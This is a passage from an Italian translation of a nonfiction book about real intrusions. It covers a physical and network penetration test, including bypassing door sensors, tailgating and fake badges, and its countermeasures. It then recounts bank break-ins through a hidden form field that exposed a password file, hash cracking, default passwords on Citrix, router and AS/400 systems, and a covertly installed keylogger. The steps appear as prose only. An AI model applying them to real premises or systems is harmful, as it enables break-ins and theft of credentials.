provette o spingendo un carrello pesante, non devi fermarti e im- 
pazzire con un apparecchio di sicurezza perché la porta si apra. 
Da fuori invece, per entrare, devi passare un badge di identità au- 
torizzato sul lettore di tessere magnetiche o digitare un codice di 
sicurezza su una tastiera. i 

Dustin notò che un certo numero di porte della Biotech equi- 
paggiate con il rex aveva uno spazio aperto in basso. Si chiese se 
poteva entrare ingannando il sensore. Se da fuori dalla porta fos- 
se riuscito a simulare il calore o il movimento di un corpo uma- 
no all’interno della stanza, forse avrebbe potuto ingannare il sen- 
sore c aprire la porta: 


Acquistai alcuni scaldamani come quelli che si comprano in un qual- 
siasi negozio di forniture. Di solito li tieni in tasca per scaldarti. Ne 
feci scaldare uno, quindi lo appesi a un fil di ferro e lo feci scivola- 
re sotto la porta per farlo risalire, come una canna da pesca, verso 
il sensore, agitandolo avanti e indietro. 

Come mi aspettavo, sbloccò la porta. 


159 


Un'altra misura di sicurezza la cui efficienza viene conside- 
rata scontata era andata al tappeto. Tempo fa anch'io feci qual- 
cosa di simile. Il trucco con l'apparecchio per il controllo del- 
l’accesso sensibile al movimento anziché al calore è di infilare un 
palloncino sotto alla porta, tenendolo dalla parte dell'apertura. 
Riempi quindi il pallone con dell’elio e lo leghi con una cordi- 
cella. Poi lo lasci fluttuare vicino al sensore manipolandolo. Co- 
me per lo scaldamani di Dustin, con un po’ di pazienza, il pallo- 
ne attiverà il trucco. 


Fine del test 


Le luci della Biotech erano accese ma nessuno era in casa. 
Anche se i dirigenti dell’It affermavano di avere attivato dei si- 
stemi di rivelamento delle intrusioni — e avevano prodotto addi- 
rittura diverse licenze per l’intercettazione delle intrusioni infor- 
matiche - Dustin è convinto che o questi dispositivi non erano 
attivi o nessuno stava veramente controllando i dati di registro. 

Con il progetto che volgeva al termine, il Keyghost doveva es- 
sere ritirato dalla scrivania dell'’amministratore di sistema. Era 
rimasto al suo posto per due settimane senza essere notato. Da- 
to che l'apparecchio era stato piazzato in una delle aree più dif- 
ficili in cui entrare seguendo qualcuno, Dustin e un collega si pre- 
sentarono allo scadere della pausa pranzo. Si affrettarono a pren- 
dere la porta e la tennero aperta, come per fare una cortesia, a 
un dipendente che stava per passare. Alla fine, ma per la prima 
e unica volta, furono affrontati. Il dipendente gli chiese se ave- 
vano i tesserini. Dustin portò la mano alla vita per mostrargli il 
suo badge fasullo. Quel gesto informale sembrò bastare. Non die- 
dero la sensazione di essere spaventati o imbarazzati, e così il di- 
pendente proseguì all’interno dell’edificio permettendo loro di 
entrare senza ulteriori domande. 

Dopo essere entrati nella zona protetta arrivarono a una sa- 
la conferenze. Sul muro c'era una grossa lavagna su cui erano 
scribacchiati alcuni termini familiari. Dustin e il collega realiz- 
zarono di trovarsi nella sala dove la Biotech teneva le riunioni 
sulla sicurezza dell’It. Un posto in cui la compagnia non avreb- 
be assolutamente voluto farli entrare. In quel momento entrò il 
loro sponsor e apparve scioccato dal trovarli lì. Scuotendo la te- 
sta, chiese loro cosa stavano facendo. Nello stesso istante arriva- 
rono altri addetti alla sicurezza della Biotech, compreso il di- 
pendente che avevano seguito all’entrata dell’edificio: 


Ci vide e disse al nostro sponsor: “Ah, vorrei solo che sapessi che ho 
fatto loro delle domande quando sono entrati”. Il tipo era fiero di 
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averci interrogati. Si sarebbe dovuto sentire in imbarazzo visto che 
la sua unica domanda non era stata sufficiente a scoprire se erava- 
mo autorizzati a entrare o meno. 


Arrivò per la riunione anche la coordinatrice la cui scrivania 
era stata equipaggiata con il Keyghost, Dustin colse al volo l'oc- 
casione e si recò al cubicolo per chiederle indietro il suo appa- 
recchio. 


Ricapitolando 


A un certo punto del test, qualcuno avrebbe dovuto certa- 
mente notare che Dustin e soci stavano setacciando grossolana- 
mente tutta la rete della compagnia, da cima a fondo. Eppure non 
ci fu una sola risposta a questa procedura invasiva. Nonostante 
i comportamenti che Dustin descrive come “urla e schiamazzi”, 
nessuno dei dipendenti del cliente notò mai alcun attacco. Per- 
sino le scansioni “rumorose” della rete per identificare qualsiasi 
sistema potenzialmente vulnerabile non erano mai state notate. 


Alla fine avevamo eseguito delle scansioni che consumavano un 
quantitativo enorme di banda passante. Era come se stessimo di- 
cendo: “Ehi, prendeteci!”. 


Il gruppo era stupito di quanto l'azienda fosse stata indiffe- 
rente all'attacco, pur essendo pienamente consapevole che i pen 
tester avrebbero fatto di tutto per entrare: 


Alla fine del test era un concerto di campane, fischi, urla, schiamazzi 
e trick-track. Niente. Non ci fu un solo segnale d'allarme. 
Fu una vera bomba. Il mio test preferito in assoluto. 


Riflessioni 


Chiunque sia curioso riguardo l’etica di un consulente di si- 
curezza, il cui lavoro richiede l’intrufolarsi in posti (sia in modo 
letterale sia figurato) in cui un estraneo non dovrebbe entrare, 
troverà le tecniche di Mudge e Dustin illuminanti. 

Se Mudge aveva usato soltanto dei metodi tecnici per gli at- 
tacchi da lui descritti, Dustin aveva usato anche del social engi- 
neering. Ma non gli era piaciuto molto. Non aveva problemi con 
gli aspetti tecnici del lavoro e ammette che questa parte gli dà 
molta soddisfazione, ma quando deve ingannare qualcuno di per- 
sona, non si sente a suo agio: 
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Ho cercato di capire razionalmente perché. Perché un aspetto mi 
urta e l’altro non mi fa alcun effetto? Forse è perché siamo educati 
a non mentire alle persone ma non ci insegnano un'etica informati- 
ca. Direi che in generale ci si sente meno in colpa quando si ingan- 
na una macchina che una persona. 


Eppure, nonostante il disagio, ogni volta che mette in atto un 
trucco di ingegneria sociale sente sempre scorrere l'adrenalina. 

Per quel che riguarda Mudge, credo sia affascinante il fatto 
che se è vero che ha realizzato uno strumento di cracking molto 
diffuso, in altre aree si affida a metodi che rientrano nell’arsena- 
le di tutti gli hacker. 


Contromisure 


Mudge aveva identificato una regola del firewall che permet- 
teva le connessioni in entrata su ogni porta Tcp o Udp (sopra al- 
la 1024) da ogni pacchetto che aveva come origine la porta 53, 
che è la porta del Dns. Sfruttando questa configurazione, era riu- 
scito a comunicare con un servizio sul computer prescelto che 
| gli aveva permesso alla fine di accedere a un “mount daemon”, il 
quale dà la possibilità all'utente di installare remotamente un 
file system. Così facendo, era riuscito a mettere le mani su alcu- 
ne informazioni riservate. 

La contromisura consiste nel revisionare attentamente tutte 
le regole del firewall per essere sicuri che siano in linea con il re- 
golamento di sicurezza aziendale. Nel corso di questo processo, 
ricordatevi che chiunque può catturare e camuffare facilmente 
l'origine di una porta. Per questo, il firewall dovrebbe essere con- 
figurato per consentire una connessione solo a servizi specifici, 
quando la regola si basa sul numero della porta di origine. 

Come citato altrove in questo libro, è molto importante assicu- 
rarsi che sia le directory sia i file abbiano i permessi appropriati. 

Dopo che Mudge e i suoi colleghi ebbero hackerato il siste- 
ma, installarono dei programmi di monitoraggio per catturare i 
nomi e le password per il login. Una contromisura efficace con- 
siste nell'usare programmi basati su protocolli crittografici, co- 
me il Ssh. 

Molte organizzazioni hanno dei regolamenti per le password 
o per altre credenziali di autenticazione, ma ne sono assoluta- 
mente carenti per quel che riguarda le reti telefoniche interne e 
i sistemi delle caselle vocali. Nel nostro caso, la squadra della 
lOpht aveva facilmente craccato diverse password delle caselle vo- 
cali appartenenti ai dirigenti della compagnia, che facevano uso 
delle tipiche password preassegnate come 1111, 1234, o della stes- 
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sa del numero interno. La contromisura ovvia è di chiedere che 
sulle segreterie telefoniche vengano installate delle password ra- 
gionevolmente sicure. (E invitate i dipendenti a non usare il Pin 
dei loro bancomat!) 

Per i computer che contengono informazioni riservate, rac- 
comandiamo caldamente il metodo descritto in questo capitolo 
per costruire le password ricorrendo a caratteri speciali non pro- 
pri della stampa, da creare con il tasto del Blocco numeri, del- 
lAlt, o con la tastiera numerica. 

Dustin era riuscito a entrare liberamente nella sala conferenze 
della Biotech perché si trovava in uno spazio pubblico. La stan- 
za aveva delle prese di rete aperte che facevano parte della rete 
interna della compagnia. Le aziende dovrebbero o disabilitare 
queste prese di rete finché non ne hanno bisogno o separare la 
rete in modo che quella locale dell'azienda non sia accessibile da 
spazi pubblici. Un'altra possibilità è un sistema filtrante di au- 
tenticazione che richieda un nome utente e una password validi 
perché una persona possa comunicare. 

Un modo per mitigare gli attacchi da accodamento è modifi- 
care quella che gli psicologi sociali chiamano “la norma della buo- 
na educazione”. Tramite una formazione appropriata, il perso- 
nale della compagnia ha bisogno di superare la sensazione di di- 
sagio che molti di noi provano nell’interrogare un’altra persona 
quando si entra, come accade spesso, in un edificio o in una zo- 
na di lavoro attraverso un'entrata protetta. I dipendenti adde- 
strati nel giusto modo sapranno come porre cortesemente delle 
domande sul badge quando è evidente che l’altra persona sta cer- 
cando di seguirli all'entrata. La regola più semplice dovrebbe es- 
sere: chiedete e se la persona non ha un badge, segnalatela alla 
sicurezza o a un addetto della reception, ma non lasciate che de- 
gli estranei vi accompagnino attraverso un'entrata protetta. 

Produrre tesserini magnetici falsi è una tecnica sin troppo fa- 
cile per entrare in un edificio presumibilmente sicuro senza es- 
sere interrogati. Anche la security spesso non guarda il badge ab- 
bastanza da vicino per poter dire se sia vero o falso. Sarebbe tut- 
to più difficile se la compagnia stabilisse (e applicasse) un rego- 
lamento che inviti i dipendenti, i consulenti esterni e i lavorato- 
ri temporanei a mettere via le loro tessere quando lasciano l'edi- 
ficio, privando così i potenziali intrusi di molte opportunità di 
guardare la grafica del badge. 

Sappiamo tutti che le guardie di servizio non esaminano da 
vicino le carte d'identità di tutti i dipendenti (cosa che, dopotut- 
to, sarebbe quasi impossibile anche per una guardia scrupolosa 
quando dalla mattina alla sera le sfila davanti un flusso continuo 
di gente). Per questo bisogna prendere in considerazione altri me- 
todi per proteggersi dagli ingressi non desiderati. Installare dei 
lettori di tessere elettroniche dà un grado molto più alto di pro- 
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tezione. Ma in aggiunta, le guardie della sicurezza devono esse- 
re formate su come interrogare in modo approfondito ogni sin- 
gola persona la cui tessera non viene riconosciuta dal lettore poi- 
ché, come suggerisce questa storia, il problema potrebbe anche 
non essere un piccolo malfunzionamento del sistema ma un in- 
truso che cerca di entrare fisicamente. 

Se la consapevolezza della sicurezza è cresciuta diffusamen- 
te tra le aziende, essa resta carente da diversi punti di vista. An- 
che le compagnie con un piano di lavoro attivo nel settore, di- 
menticano spesso il bisogno di una formazione specializzata dei 
manager in modo che essi possiedano tutti gli strumenti per as- 
sicurarsi che i loro sottoposti seguano le procedure comandate. 
Le aziende che non educano tutti i dipendenti alla sicurezza so- 
no aziende con una sicurezza labile. 


Conclusioni 


Non accade spesso che i lettori abbiano l’opportunità di da- 
re uno sguardo ravvicinato al modo di pensare e di agire di co- 
loro che hanno contribuito a forgiare l'arsenale degli strumenti 
dell’hacker. Mudge e la l0phtCrack sono nei libri di storia. 

Secondo Dustin Dykes della Callisma, le compagnie che ri- 
chiedono un penetration test prendono spesso delle decisioni che 
vanno contro i loro migliori interessi. Non saprai mai quant'è ve- 
ramente vulnerabile la tua azienda finché non avrai autorizzato 
un test a tutto campo e senza limitazioni di sorta, che permetta 
l'ingresso fisico tramite il social engineering nonché attraverso 
gli attacchi tecnici. 
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7. 
Naturalmente la vostra banca è sicura, no? 


Se cercate di mettere i vostri sistemi al riparo 
dai folli, ci sarà sempre qualche folle che avrà 
più immaginazione di voi. 

Juhan 


Anche se le altre organizzazioni non hanno le qualifiche ne- 
cessarie nel campo della sicurezza per sbarrare la strada agli 
hacker, ci farebbe quantomeno piacere pensare che il nostro de- 
naro è al sicuro, che nessuno può ottenere informazioni sulle no- 
stre transazioni finanziarie o addirittura, incubo degli incubi, en- 
trare nei nostri conti correnti e digitare dei comandi per inta- 
scarsi i nostri soldi. 

La cattiva notizia è che la sicurezza in molte banche e in al- 
tri istituti finanziari non è così ferrea come i responsabili pensa- 
no che sia. I casi che seguono spiegano il perché. 


Nella lontana Estonia 


Questa storia dimostra che a volte anche chi non è un hacker 
può riuscire a hackerare una banca. E non è una buona notizia 
per le banche, né per nessuno di noi. 

Non sono mai stato in Estonia ed è possibile che non ci andrò 
mai. Il nome evoca immagini di antichi castelli circondati da cu- 
pe foreste e contadini superstiziosi, quel genere di posti in cui uno 
straniero non se ne va in giro senza un’ampia scorta di paletti di 
legno e proiettili d’argento. Questo stereotipo ignorante (alimen- 
tato dai film dell'orrore di serie B ambientati in foreste, villaggi e 
castelli dell'Europa dell'Est) si rivela totalmente infondato. 

Di fatto la realtà è piuttosto diversa. L'Estonia è assai più mo- 
derna di come l'ho appena fotografata, come ho avuto modo di 
imparare da un hacker di nome Juhan che ci vive. Ventitré anni, 
Juhan vive nel cuore della città, in un ampio appartamento di 
quattro stanze “con un soffitto altissimo e un sacco di colori”. 

LEstonia è un piccolo paese di circa 1,3 milioni di abitanti 
(grossomodo la popolazione di una città come Philadelphia) in- 
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castonato fra la Russia e il Golfo di Finlandia. La capitale Tallinn 
è tuttora deturpata da enormi blocchi di appartamenti, grigi mo- 
numenti al tentativo del defunto impero dell’Unione Sovietica di 
dare alloggio ai suoi sudditi nel modo più economico possibile. 

Juhan si lamenta del fatto che “a volte quando la gente si vuo- 
le informare sull’Estonia chiede cose come ‘Avete dei dottori? Ave- 
te l'Università?”. Ma la realtà è che l'Estonia è entrata a far parte 
dell’Unione Europea il primo maggio del 2004”. Molti estoni —- — 
dice Juhan - lavorano pensando al giorno in cui potranno tra- 
slocare dai loro minuscoli appartamenti dell’epoca sovietica, per 
andare a vivere per conto loro in una zona tranquilla fuori città. 
Sognano di poter finalmente guidare “una macchina affidabile 
d'importazione”. Di fatto ormai diversa gente ha l'automobile, e 
sempre più persone cominciano ad avere una casa di proprietà, 
“così le cose migliorano di anno in anno”. Anche dal punto di vi- 
sta della tecnologia — spiega Juhan ~- la situazione nel paese non 
è affatto stagnante: 


Gia all’inizio degli anni novanta, l'Estonia cominciò a implementa- 
re l'infrastruttura della gestione elettronica delle banche, gli spor- 
telli bancomat e l'Internet banking. È un paese molto moderno, an- 
zi alcune imprese estoni forniscono tecnologia e servizi informatici 
ad altri paesi europei. 


Penserete che questo crei le condizioni per un paradiso degli 
hacker: grande uso di Internet, ma probabilmente sotto la media 
per quel che riguarda la sicurezza. Ma secondo Juhan non è af- 
fatto così: 


A proposito della sicurezza di Internet, l'Estonia in genere è consi- 
derato un luogo sicuro per il fatto che il paese e le comunità sono 
molto piccole. In effetti è abbastanza conveniente per i fornitori di 
servizi sviluppare tecnologia. Per quel che riguarda il settore finan- 
ziario, credo che possa essere d’aiuto a farvi un'idea il fatto che in 
Estonia non c'è mai stata l'infrastruttura necessaria a far circolare 
gli assegni bancari, gli assegni che, per esempio, in America si usa- 
no moltissimo per pagare nei negozi. 


Pochissimi cittadini estoni vanno in banca, dice Juhan: “Qua- 
si tutti hanno dei conti correnti, ma la maggioranza non sa nean- 
che com'è fatto un assegno”. Non perché siano particolarmente 
ignoranti di questioni finanziarie, ma perché almeno in questo 
ambito sono ben più avanti di noi, come spiega Juhan: 


Non abbiamo mai avuto una grande rete di banche. Già all’inizio de- 
gli anni novanta avevamo cominciato a sviluppare l'infrastruttura 
delle banche elettroniche e dell'Internet banking. Più di un 90-95 
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percento delle persone e delle imprese che fanno trasferimenti di de- 
naro tra loro usa Internet. 


E utilizzano la carta di credito o bancomat. 


È più conveniente fare pagamenti diretti coni servizi di Internet banking 
o con bancomat e non c'è semplicemente ragione di usare gli assegni. 
A differenza dell'America, qui praticamente tutti usano Internet per 
gestire i propri conti correnti e pagare le bollette. 


La Banca di Perogie 


Juhan è un grande patito di computer fin dalla tenera età di 
dieci anni, ma non si considera un hacker, solo un whitehat che 
prende sul serio la sicurezza. Intervistarlo non è stato un pro- 
blema visto che ha iniziato a studiare inglese dalla seconda ele- 
mentare. Il giovane estone ha anche studiato e viaggiato molto 
all’estero, ulteriori opportunità che hanno sviluppato le sue ca- 
pacità di conversare in inglese. 

Uno degli ultimi inverni in Estonia è stato particolarmente 
rigido, con condizioni polari, banchi di neve ovunque e tempe- 
rature fino a meno 25 gradi. È stato così duro che anche gli abi- 
tanti del luogo, abituati a inverni gelidi, non volevano uscire a 
meno che non ce ne fosse davvero bisogno. Fu un ottimo mo- 
mento, per un appassionato di computer, per rimanere incollato 
allo schermo a caccia di qualsiasi cosa interessante a sufficienza 
da catturare la sua attenzione. 

Fu così che Juhan si imbatté nel sito di quella che chiamere- 
mo la Banca di Perogie. Sembrava un bersaglio degno di essere 
esplorato: 


Misi piede nella sezione interattiva delle domande Faq (le più fre- 
quenti) che permette alla gente di pubblicare richieste di chiarimenti. 
Ho l'abitudine di guardare il codice sorgente dei form! delle pagine 
web. Insomma, diciamo che arrivai su un sito e iniziai a dargli un’oc- 
chiata. Conosci il procedimento: stai navigando e cominci a sfogliare 
le pagine di un sito senza alcuno scopo strategico. 


Vide che il file system era del tipo usato da Unix, il che cir- 
coscriveva immediatamente i tipi di attacco che avrebbe prova- 
to. Il codice di varie pagine rivelò una variabile nascosta che pun- 
tava al nome di un file. Quando provò a cambiare il valore inse- 
‘ rito in questo elemento nascosto del form “fu evidente che non 


1 Ii form è un formulario per l'inserimento dinamico dei dati da parte del- 
l'utente. [N.d.7.] 
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facevano nessun tipo di richiesta di autenticazione. Quindi, che 
io inserissi un dato dal sito della banca o da un computer locale, 
per il server della banca era lo stesso”, dice. 

Cambiò gli attributi di questo elemento nascosto del form per- 
ché puntasse al file delle password, il che gli dava la possibilità 
di vedere il file sullo schermo. Scoprì poi che le password non 
erano state “oscurate”, il che significa che le password di ogni ac- 
count erano visibili nel loro formato di crittazione standard. Poté 
così scaricare le password crittate e passarle in un software per 
craccarle. 

Il software usato da Juhan è un programma molto conosciu- 
to che ha il nome ironico e delizioso di “John the Ripper”, che 
fece funzionare con un normale dizionario di inglese. Perché in- 
glese invece di estone? “È prassi comune da queste parti avere 
delle password in inglese.” Il fatto è che molti estoni hanno una 
buona conoscenza di base dell’inglese. 

Il software per craccare le password non ci mise molto — so- 
lo una quindicina di minuti sul suo computer - dal momento che 
le password erano elementari: semplici parole inglesi con qual- 
che numero aggiunto alla fine. Una di queste era molto prezio- 
sa: era la password di root, che gli dava i privilegi da ammini- 
stratore del sistema. E non era tutto: 


C'è questo servizio di telebanking che ha un certo nome commer- 
ciale che non sono sicuro di poter citare qui, ma [trovai] un account 
per quel servizio. Aveva tutto l'aspetto di essere probabilmente lac- 
count di sistema che faceva funzionare i vari servizi su quel server. 


Non si spinse oltre, spiegando che “avere le password fu il pun- 
to in cui mi fermai”. Il nome del gioco si chiamava “prudenza”: 


Avrei potuto mettermi nei guai. Dopotutto, lavoro nel ramo della si- 
curezza. Avevo buone ragioni per non fare alcun danno. 

Ma la situazione era troppo favorevole per essere vera. Immaginai 
che poteva essere il classico “honey pot”, una trappola per attirare 
persone come me e poi perseguirle legalmente. Così lo feci presen- 
te ai miei superiori e loro informarono la banca. 


Le sue rivelazioni non lo misero nei pasticci né con il proprio 
datore di lavoro, né con la banca, anzi. Alla sua ditta venne of- 
ferto l’incarico di proseguire la ricerca e trovare una soluzione 
per tappare la falla. La ditta assegnò a Juhan il lavoro, immagi- 
nando che avrebbe potuto portare a termine quello che aveva già 
cominciato: 


? Riferimento a “Jack lo Squartatore”. [N.d.T.} 
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Per me fu sorprendente che gli eventi andassero in quel modo per- 
ché in effetti in Estonia il livello di sicurezza in Internet è superio- 
re che altrove. Non lo dico io, ma da molta gente che è venuta qui 
da altri paesi. Insomma, fu piuttosto sorprendente scoprire questo 
baco nella sicurezza e quanto fosse facile mettere le mani su un ge- 
nere di informazioni molto riservate. 


Opinione personale 


Da esperienze come questa, Juhan si è convinto che è nel mi- 
glior interesse di una ditta che si ritrova compromessa dall’inter- 
vento di un hacker non perseguirlo legalmente, ma piuttosto col- 
laborare con lo stesso per risolvere il problema che ha rivelato: 
una sorta di filosofia del “se non puoi sconfiggerli, fatteli amici”. 
Ovviamente il governo di solito non la vede allo stesso modo, co- 
me dimostra ancora una volta la caccia data ad Adrian Lamo (ve- 
di capitolo 5), arrestato e accusato di reati penali nonostante aves- 
se fornito (perlopiù) un servizio di utilità pubblica consigliando 
le imprese sulle proprie vulnerabilità. Un processo si può rivela- 
re senza alcun dubbio una situazione a perdere per entrambi, spe- 
cialmente se l'impresa non apprende qual è la vulnerabilità spe- 
cifica sfruttata dall’hacker per intrufolarsi nella sua rete. 

La risposta automatica al problema consiste nell’affastellare 
una serie di firewall e di difese, ma è possibile che con questo ap- 
proccio si ignorino del tutto bachi di sicurezza passati inosser- 
vati e che vengono invece scoperti dagli hacker più astuti, per non 
parlare dei bug già ampiamente conosciuti dalla comunità hacker. 
Juhan sintetizza la sua opinione a proposito in modo particolar- 
mente chiaro: 


Se cercate di mettere i vostri sistemi al riparo dai folli, ci sarà sem- 
pre qualche folle che avrà più immaginazione di voi. 


L'hackeraggio intercontinentale di una banca 


Gabriel è di madrelingua francese e vive in una cittadina ca- 
nadese così piccola che, anche se lui si considera un hacker white 
hat e pensa che il defacciamento di un sito sia un atto stupido, 
riconosce di “averlo fatto una o due volte, perché ero arrivato a 
un livello di noia che rasentava la disperazione”. O quando tro- 
vava un sito “in cui la sicurezza era progettata così male che qual- 
cuno si meritava una lezione”. 

Ma come è potuta arrivare una persona della campagna ca- 
nadese a hackerare una banca in uno stato del Sud degli Usa, pro- 
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prio nel cuore di Dixieland?? Gabriel scoprì un sito che mostra- 
va “tutte le imprese che fanno affari con Internet, con le relative 
reti di loro proprietà”.* Fece una ricerca in questa lista “per pa- 
role come governo, banca o qualunque altra cosa”, e saltarono 
fuori delle sequenze di indirizzi Ip (per esempio dal 69.75.68.1 al 
69.75.68.254) che poi scansionò. 

Uno degli articoli in cui si imbatté fu un indirizzo Ip appar- 
tenente a una banca specifica nel cuore degli stati del Sud. Fu a 
partire da lì che Gabriel si lanciò in quello che sarebbe diventa- 
ta un'azione continuativa di hacking. 


Hacker non si nasce, si diventa 


All’età di quindici anni (che, come avrete notato dai capitoli 
precedenti, viene considerato un inizio tardivo, un po’ come co- 
minciare a giocare a pallacanestro alle superiori e arrivare fino 
alla Nba) Gabriel era passato dal giocare a videogiochi come 
Doom a fare hacking insieme a un amico sul suo 386 con un di- 
sco rigido da 128 Mb. La sua macchina si era dimostrata troppo 
lenta per quello che voleva fare; Gabriel aveva speso quella che 
per lui era una fortuna giocando in un Internet caffé locale ai vi- 
deogiochi online. 

Il mondo dei computer dava dipendenza e un dolce sollievo 
dall'ambiente duramente competitivo della scuola, in cui Gabriel 
doveva sopportare i suoi compagni; lo prendevano in giro gior- 
no dopo giorno solo perché era diverso. Non lo aveva aiutato il 
fatto di essere il più piccolo della classe e di essere appena arri- 
vato; aveva iniziato la scuola in un’altra provincia prima che la 
sua famiglia si trasferisse. Nessuno ha mai detto che essere uno 
smanettone sia una cosa facile. 

I suoi genitori, entrambi dipendenti dell’amministrazione 
pubblica, non potevano capire la sua ossessione per i computer, 
che sembra comunque essere un problema comune per le gene- 
razioni cresciute in periodi in cui la tecnologia è onnipresente. 
“Non volevano mai che mi comprassi un computer,” ricorda. Vo- 
levano solo che “uscissi e facessi qualcos'altro”. Mamma e papà 
erano così preoccupati per il ragazzo che lo mandarono da uno 
psicologo per aiutarlo a “diventare normale.” Qualunque cosa sia 
avvenuta in quelle sedute, non produsse alcun effetto su Gabriel. 


3 “Dixie” è il termine con cui negli Stati Uniti d'America vengono chiamati 
familiarmente gli stati del Sud. [N.d.7.] 

4 Anche se non viene indicato di che sito si tratta, i dati sono comunque di- 
sponibili su www.flumps.org/ip/. 
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Non divenne un adolescente lungo e dinoccolato che rinuncia al- 
la sua passione per i computer. 

Gabriel si iscrisse ai corsi della Cisco, in un istituto tecnico lo- 
cale. Completamente autodidatta, spesso ne sapeva più degli in- 
segnanti, che a volte rimandavano le risposte alle sue domande 
più difficili. Gabriel, oggi ventunenne, sembra avere il talento ti- 
pico dell’hacker: quello che permette di fare delle scoperte senza 
l’aiuto di nessuno. Anche quando si tratta di un exploit conosciu- 
to, questo tipo di abilità marca la differenza fra il mondo degli 
hacker e quello degli “script kiddies”, che non scoprono nulla da 
soli ma semplicemente scaricano trucchetti carini dalla rete. 

Uno dei suoi programmi preferiti si chiamava Spy Lantern 
Keylogger. Era uno di quei software in grado di seguire come 
un'ombra il lavoro di una persona al computer, consentendo al- 
l’hacker di intercettare segretamente ogni tasto digitato sulla ta- 
stiera, con la differenza che questo dispositivo rimane in teoria 
totalmente invisibile alla macchina su cui viene usato. 

Inoltre, Gabriel usava anche l'opzione “ombra” di un’applica- 
zione chiamata Citrix MetaFrame (un pacchetto software per lac- 
cesso su richiesta alle reti d'impresa), progettata per permettere 
agli amministratori di sistema di monitorare e dare assistenza agli 
impiegati di una ditta. Grazie all’opzione ombra, l’amministrato- 
re di sistema è come se si trovasse dietro le spalle dell’utente, ve- 
desse tutto quello che accade sul suo schermo, quello che sta fa- 
cendo e digitando, e addirittura prendesse il controllo del com- 
puter. Un hacker esperto che sa localizzare sul server di un'im- 
presa un Citrix funzionante può fare lo stesso: assumere il con- 
trollo dei computer. Ovviamente c’è bisogno di grande cautela. Se 
non sta attento, le sue azioni verranno individuate; chiunque sia 
davanti al computer infatti vedrà il risultato delle operazioni che 
l'hacker sta compiendo (il cursore che si muove, applicazioni che 
si aprono e così via). Ma questa opportunità può anche regalare 
all’hacker qualche istante innocente di divertimento. 


Vedo gente che scrive e-mail alla moglie o cose del genere. Di fatto 
puoi muovere il loro mouse sullo schermo. È divertente. 

Una volta entrai nel computer di un tizio e cominciai a muoverzgli il 
cursore. Lui aprì il blocco note e io gli scrissi: “Ehi”. 


Naturalmente un hacker che voglia impadronirsi del com- 
puter di qualcuno di solito sceglie un momento in cui presume 
non esserci in giro nessuno. “Normalmente lo faccio dopo mez- 
zanotte,” mi spiega Gabriel, “per essere sicuro che non ci sia 
nessuno. Oppure semplicemente controllo il loro schermo: se è 
attivo il salvaschermo, di solito significa che al computer non 
c'è nessuno.” 
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Ma una volta fece un errore di valutazione e l'utente era ef- 
fettivamente davanti al computer. La scritta “So che mi stai guar- 
dando!” apparve sullo schermo di Gabriel. “Mi scollegai imme- 
diatamente.” Un'altra volta dei file che aveva messo al sicuro ven- 
nero scoperti. “Li cancellarono e mi lasciarono un messaggio: TI 
PERSEGUIREMO CON TUTTI I MEZZI POSSIBILI CONSENTITI DALLA LEGGE.” 


L'irruzione nella banca 


Quando Gabriel, gironzolando in rete, venne a conoscenza 
dei dettagli degli indirizzi Ip della banca del Sud, ne seguì la trac- 
cia, scoprendo che quella in cui si era imbattuto non era affatto 
una banca di paese, ma che aveva una fitta rete di relazioni na- 
zionali e internazionali. Cosa ancora più interessante, su uno dei 
server della banca era in funzione Citrix MetaFrame, il software 
installato sui server che permette a un utente di accedere a di- 
stanza alla propria postazione di lavoro. Gli si accese subito una 
lampadina, grazie a una delle abilità apprese insieme a un ami- 
co nelle prime esperienze di hacking: 


Con questo amico avevamo scoperto che molti dei sistemi su cui gi- 
rano i servizi della Citrix non hanno delle buone password. Le con- 
segnano già abilitate, ma lasciano l'utente finale senza password. 


Gabriel si mise al lavoro con un port scanner, uno strumen- 
to usato dagli hacker (o da chi effettua test di sicurezza) per ana- 
lizzare altri computer sulla rete e individuare delle porte aperte. 
Nello specifico stava cercando un qualsiasi sistema con la porta 
1494 aperta, perché era quella la porta usata per accedere da una 
postazione remota ai servizi del terminale Citrix. Quindi un si- 
stema con la porta 1494 aperta era un sistema di cui si sarebbe 
potuto impadronire. 

Ogni volta che ne trovava uno faceva una ricerca della paro- 
la “password” su tutti i file di quel computer. E un po’ come pas- 
sare il setaccio alla ricerca dell’oro. La maggior parte delle volte 
ne esci a mani vuote, ma ogni tanto scopri una pepita. In questo 
caso, la pepita poteva essere un promemoria che qualcuno ave- 
va infilato in un file, magari qualcosa come “la password da am- 
ministratore di mail2 è ‘happyday ” 

Alla fine Gabriel trovò la password del firewall della banca. 
Provò a collegarsi a un router, sapendo che alcuni router comuni 
hanno delle password preassegnate come “admin” o “administra- 
tor”, e che molte persone — non solo gli sprovveduti utenti dome- 
stici, ma fin troppo spesso anche i professionisti dell It - mettono 
in funzione una nuova unità senza nemmeno preoccuparsi di cam- 
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biare le password di default. E quello che Gabriel effettivamente 
trovò fu un router con una password preassegnata. 

Una volta ottenuto l’accesso, aggiunse una nuova regola alla 
configurazione del router, permettendo le connessioni in entra- 
ta sulla porta 1723 - quella usata per i servizi del Virtual Private 
Network (Vpn) della Microsoft - progettata per consentire una 
connessione sicura alle reti aziendali da parte di utenti autoriz- 
zati. Dopo essersi autenticato sul Vpn, al suo computer venne as- 
segnato un indirizzo Ip sulla rete interna della banca. Fortuna- 
tamente per lui, la rete era “piatta”, il che significa che tutti i si- 
stemi erano accessibili dallo stesso segmento della rete. In que- 
sto modo, avendo hackerato una delle macchine, aveva ottenuto 
automaticamente l’accesso agli altri sistemi della stessa rete. 

Hackerare la banca, dice Gabriel, fu “veramente una scioc- 
chezza”. La banca aveva chiamato un gruppo di consulenti per 
la sicurezza, che, una volta andati via, avevano lasciato un dos- 
sier. Gabriel scoprì questo dossier riservato su uno dei server. Con- 
teneva una lista di tutti i punti vulnerabili che i consulenti ave- 
vano trovato, fornendo così delle comode istruzioni su come bu- 
care il resto della rete. 

Il server usato dalla banca era un Ibm As/400, una macchina 
con cui Gabriel aveva poca dimestichezza. Scoprì tuttavia che il 
server dei domini di Windows conteneva un manuale completo 
di istruzioni per le applicazioni usate su quel sistema, che Ga- 
briel scaricò. Quando poi digitò “administrator”, la password 
preassegnata di ogni Ibm, il sistema lo lasciò entrare. 


Direi che il 99 percento delle persone che lavoravano lì usava “pass- 
word123” come password. Non avevano nemmeno un programma 
antivirus che girava dietro le altre applicazioni. Lo lanciavano qual- 
cosa come una volta alla settimana. 


Gabriel non si fece problemi e installò Spy Lantern Keylog- 
ger il suo software preferito, per la capacità unica che ha di re- 
gistrare simultaneamente le informazioni di chiunque entri nel- 
